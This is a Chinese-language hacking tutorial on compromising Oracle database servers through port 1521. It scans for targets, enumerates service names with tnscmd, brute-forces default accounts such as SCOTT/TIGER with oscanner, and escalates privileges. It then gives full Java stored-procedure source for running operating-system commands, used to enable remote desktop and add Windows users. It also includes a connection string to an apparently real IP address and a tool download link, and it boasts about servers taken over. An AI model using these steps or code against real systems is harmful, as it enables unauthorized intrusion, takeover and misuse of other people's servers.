入侵1521详细过程

工具:

1.oracle精简版(我这已经安装了,这跳过)

2.sqlplus.exe 连接oracle数据库用(oracle里自带)

3.tnscmd.exe   查看服务器名字/sid

4.oscanner.exe oracle弱口令猜解工具

第一步:扫描开了1521端口的服务器,oracle默认1521端口(这步跳过,端口谁都会扫)

第二步:利用tnscmd.exe查看服务器数据库的名字

从这步开始了,这是刚找好的IP,就用它演示了,“SERVICE_NAME=*****”这就是我们需要用到的。

第三步:oscanner.exe猜解弱口令。

猜解不会太快,呵呵,“DBSNMP/DBSNMP found”发现一个,再让它往下继续猜......“SCOTT/TIGER
found'又一个,猜完了

第四步:提权(提升oracle用户权限、开3389、添加windows用户)

看操作吧,首先当然是要连接数据库,"已连接。"那就是成功了,呵呵,oracle能猜出很多弱口令,但是

很多都是低权限的,没法执行命令,所以我们就要提升oracle用户权限,“已选择14行。”权限很低~~~

需要重新连接数据库,再次查看权限,“已选择140行。”这就可以让我们为所欲为了,呵呵,看到这些顿时兴奋了,

这就是成功执行命令了,“PL/SQL 过程已成功完成。Java 已创建。函数已创建。过程已创建。.......”

脚本里我加了开3389和添加用户......连接它的3389试试....

熟悉的画面,一台oracle服务器就这么被拿下了,呵呵........

这是手工一步步进行的,方便大家了解这一过程,我也有全自动的1521,并非网上所流传的,效果那是相当好,呵呵

但是不足之处就是,抓的没数量,但有质量!!!呵呵......

远程接oracle命令:
C:\>sqlplus /nolog
SQL> connect SCOTT/TIGER@(description=(address_list=(address=(protocol=tcp)(host=60.30.73.162)(port=1521)))(connect_data=(SERVICE_NAME=ebestXDB)));

tnscmd用法:tnscmd status -h ip --indent

oscanner用法:oscanner -s ip -v

查看当前用户权限:SELECT PRIVILEGE FROM SESSION_PRIVS;

利用java执行cmd:

create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer

, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
/
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;
grant javauserpriv to system;
exec:x:=run_cmz('cmd命令');

下载地址:

http://d.namipan.com/d/93f4c0a29fb892d5dfd7b5ff1434c25d550856b3ffffb900

源链接

Hacking more

...